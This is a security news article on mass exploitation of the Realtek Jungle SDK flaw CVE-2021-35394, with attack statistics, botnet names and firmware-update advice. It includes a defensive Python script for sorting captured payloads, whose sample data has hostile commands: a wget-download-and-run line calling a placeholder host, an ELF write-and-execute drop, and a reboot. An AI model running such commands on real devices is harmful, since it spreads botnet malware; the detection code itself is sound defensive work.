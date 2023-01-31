Cyber security specialists are warning of a spike in attempts to weaponize a critical remote code execution flaw in the Realtek Jungle SDK, observed since early August 2022.

According to Palo Alto Networks Unit 42, the ongoing campaign had logged 134 million exploit attempts as of December 2022, with 97 percent of them occurring in the four months leading up to that point.

In summary: almost 50% of the attacks originated from the United States (48.3%), followed by Vietnam (17.8%), Russia (14.6%), the Netherlands (7.4%), France (6.4%), Germany (2.3%) and Luxembourg (1.6%).

Furthermore, of the attacks exploiting the flaw that originated from Russia, 95% singled out organizations in Australia.

“Many of the attacks we observed attempted to deliver malware to infect vulnerable IoT devices,” Unit 42 researchers stated in their report on the Realtek case, adding that “threat actors are using this vulnerability to carry out large-scale attacks on smart devices around the world.”

The vulnerability in question is CVE-2021-35394 (CVSS score: 9.8), a set of buffer overflows and an arbitrary command injection bug that can be abused to execute attacker-supplied code with the highest level of privilege (root on these embedded devices) and take control of the affected equipment.

The issues were disclosed by ONEKEY (formerly IoT Inspector) in August 2021. Because the SDK is embedded by many manufacturers rather than shipped as a product of its own, the single vulnerability affects a variety of devices from D-Link, LG, Belkin, ASUS and NETGEAR.

Unit 42 said it observed three different types of payload delivered through in-the-wild exploitation of the Realtek flaw:

a script that runs a shell command on the target device to download additional malware;

an injected command that writes a binary payload to a file and then executes it;

an injected command that directly reboots the target device to cause a denial-of-service (DoS) condition.
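As an added example (not code from the Unit 42 report or from this article), the following Python triages captured injection strings into the three payload types just described. The sample payloads, the 203.0.113.10 address and the regular-expression heuristics are all constructed for illustration and are assumptions, not observed indicators; the patterns are a starting point to tune against your own honeypot or IDS telemetry.

```python
import re

# Constructed sample payloads for a triage run. They are NOT taken from the
# Unit 42 report; they only mimic the three payload shapes the report describes.
SAMPLE_PAYLOADS = {
    "dl":    "cd /tmp; wget http://203.0.113.10/bins.sh -O bins.sh; chmod +x bins.sh; sh bins.sh",
    "bin":   r"printf '\x7fELF\x01\x01\x01' > /tmp/.x; chmod 777 /tmp/.x; /tmp/.x",
    "dos":   "reboot",
    "recon": "cat /proc/cpuinfo",
}

# Command separators a shell honours inside one injected string.
SEP_RE = re.compile(r"\s*(?:;|&&|\|\||\||\n)\s*")
# Heuristic command patterns (assumptions; extend them from your own telemetry).
DOWNLOAD_RE = re.compile(r"^(?:busybox\s+)?(?:wget|curl|tftp|ftpget)\b")
REBOOT_RE = re.compile(r"^(?:busybox\s+)?(?:reboot|halt|poweroff)\b")
REDIRECT_RE = re.compile(r">>?\s*([^\s;|&]+)")
INTERP_RE = re.compile(r"^(?:sh|ash|bash|busybox\s+sh)\s+")
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s'\";|&]+")


def split_commands(payload: str) -> list[str]:
    """Split one injected string into the individual commands the shell would run."""
    return [c for c in SEP_RE.split(payload.strip()) if c]


def _executes(cmd: str, path: str) -> bool:
    """True if `cmd` runs the file at `path` directly, via ./name, or via an interpreter."""
    words = INTERP_RE.sub("", cmd).split()
    if not words:
        return False
    base = path.rsplit("/", 1)[-1]
    return words[0] in (path, "./" + base)


def classify(payload: str) -> str:
    """Map an injected command string to one of the three observed payload types."""
    cmds = split_commands(payload)
    if any(REBOOT_RE.match(c) for c in cmds):
        return "reboot-dos"
    if any(DOWNLOAD_RE.match(c) for c in cmds):
        return "download-script"
    # A file written through shell redirection and later executed is a binary drop.
    written = [m.group(1) for c in cmds for m in REDIRECT_RE.finditer(c)]
    if any(_executes(c, p) for p in written for c in cmds):
        return "write-and-exec"
    return "other"


def extract_urls(payload: str) -> list[str]:
    """Pull download URLs out of a payload for blocklisting or pivoting."""
    return URL_RE.findall(payload)


def triage(payloads: dict[str, str]) -> dict[str, dict]:
    """Classify every payload and attach its URLs; this is the record you would log."""
    return {
        name: {"type": classify(p), "urls": extract_urls(p)}
        for name, p in payloads.items()
    }


if __name__ == "__main__":
    for name, result in triage(SAMPLE_PAYLOADS).items():
        print(f"{name:6} {result['type']:16} {result['urls']}")
```

Run it as a script to print one line per sample, or import `classify` and `triage` into a log-processing pipeline. Anything landing in write-and-exec deserves a look at the bytes being written, since that is the only one of the three types that carries the malware itself rather than a URL pointing at it.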

In addition, known botnets such as Mirai, Gafgyt, and Mozi have been distributed through the abuse of CVE-2021-35394, as well as a new Golang-based DDoS (Distributed Denial-of-Service) botnet, named RedGoBot.

First observed in September 2022, the RedGoBot campaign drops a shell script that downloads a series of botnet clients compiled for different CPU architectures; once launched, the malware is able to execute operating system commands and mount DDoS attacks.

The results once again highlight the importance of updating software in a timely manner to avoid exposure to potential threats.

“The wave of attacks leveraging CVE-2021-35394 shows that threat actors are very interested in supply chain vulnerabilities, which can be difficult for the average user to identify and fix,” the researchers concluded. “These issues can make it difficult for the affected user to identify the specific downstream products that are being exploited.”

Realtek, to one degree or another, almost all of us have it

Without sounding alarmist, Realtek silicon turns up in the most unlikely places: desktop computers, laptops, probably even a few tablets.

Usually Realtek supplies the audio codecs and network chips found on motherboards (often Intel-based). The vulnerable component here, however, is not the audio codec: the Realtek Jungle SDK is the firmware development kit that ships with Realtek's networking SoCs, the ones built into routers, access points, repeaters and other IoT devices. A PC with an on-board Realtek sound card is therefore not what this campaign targets, which is also why the affected products listed above come from D-Link, LG, Belkin, ASUS and NETGEAR rather than from PC makers.

There is also no need to wait for a fix: Realtek published a patched SDK shortly after the August 2021 disclosure, but that fix only reaches an end device through the device vendor's own firmware update. The practical check is to look up your router or IoT device on the vendor's support page and install the latest firmware; where the vendor no longer provides updates, keep the device off the internet-facing side of the network or replace it.